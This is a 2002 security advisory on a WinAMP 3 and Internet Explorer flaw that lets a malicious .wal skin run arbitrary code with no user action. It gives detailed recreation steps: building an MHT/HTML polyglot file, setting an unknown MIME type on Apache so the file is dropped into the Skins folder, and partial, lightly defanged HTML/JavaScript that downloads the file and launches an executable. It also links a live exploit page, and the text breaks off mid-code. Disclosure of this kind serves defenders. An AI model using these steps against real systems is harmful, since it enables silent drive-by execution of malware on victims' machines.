The new WinAMP 3 fails to address a serious arbitrary code execution vulnerability when the program is combined with Internet Explorer. The vulnerability allows a remote attacker to cause the program to execute arbitrary code automatically without the need for user intervention.
Credit:
The information has been provided by Jelmer.
Vulnerable systems:
* WinAMP 3
* WinAMP 2 (Though this vulnerability advisory was written for WinAMP 3, WinAMP 2 has a similar problem)
WinAMP 3 uses a new skinning system that uses the .wal extension, this skin type is opened automatically in MSIE (it does not prompt for download). The skin is stored in a known location on the user's hard disk namely:
C:\Program Files\Winamp3\Skins
(This is the default location given by the program)
Exploit:
A working exploit code is available at http://kuperus.xs4all.nl/winamp3.htm (NOTE, this is a working exploit code, going to the link will cause WinAMP to run arbitrary code).
Note that this version exploit code does not use any MSIE hole to invoke the executable and it will continue to work even after Microsoft patches its browser.
Recreation steps:
1) Create a directory c:\exploit
2) Place an EXE file in it, let us call it payload.exe, then create a file called exploit.htm and give it the following contents:
3) Open the file in Internet Explorer, choose file > save as, and save it as > exploit.mht
4) Open it in notepad and add the following line to the top
<html style="display:none;">
It should look like this :
<html style="display:none;">
From: <Saved by Microsoft Internet Explorer 5>
Subject:
Date: Mon, 5 Aug 2002 18:30:03 +0200
MIME-Version: 1.0
Then look for the body section of this HTML document (it looks a little mangled) delete everything between the body tags and place an object tag in its place, so it looks like this:
(To prevent execution, the O was replaced with a 0)
This code will later be used to invoke our executable. What we have done is we have slightly altered the MHT file so that it can be viewed both as HTML and as MHT file. Files starting with an <html> tag are always seen as HTML files in Internet Explorer.
5) Now we want to place this on the user's hard disk. We know WAL files are opened automatically by WinAMP 3 and placed in a known location so we will rename our exploit.mht file to WAL. Unfortunately Internet Explorer disrespects mime types so by having added a <html> tag to the MHT file it tries top open it as an <html> file the only way Jelmer found around this is to set the mime type to a value MSIE does not know. Jelmer chose x-foo/x-bar. If you are using Apache, you can add the following to your mime.types file
x-foo/x-bar wal
This means that the web server will pass this mime type along with every file requested ending in .wal. When we now request this file, it will be opened by WinAMP 3 and an error message will follow shortly. However, at that time it is all ready too late, our exploit.wal file has been placed in
C:\Program Files\WinAMP3\Skins\exploit.wal
Now all that remains is bringing it together by making the following sequence of events occur
1. Download our exploit.wal
2. Wait a few seconds for it to finish downloading then call exploit.wal as HTML file (the file also doubles as MHT file and the object tag included in the HTML portion points to itself as the codebase)
Here is the code for this:
<html>
<body>
Waiting for 5 seconds..
<!-- download our renamed mht file and place it on the users disk -->
<!frame src="amp.wal" style="display:none"></iframe>
<scr!pt language="javascript">
//wait for 5 seconds
setTimeout("ExecuteFile()",5000);
function ExecuteFile() {
// open the saved wal file as html file
// oddly when called from disk it didn't open it as html file so we need to force this behaviour by using a modeless dialog
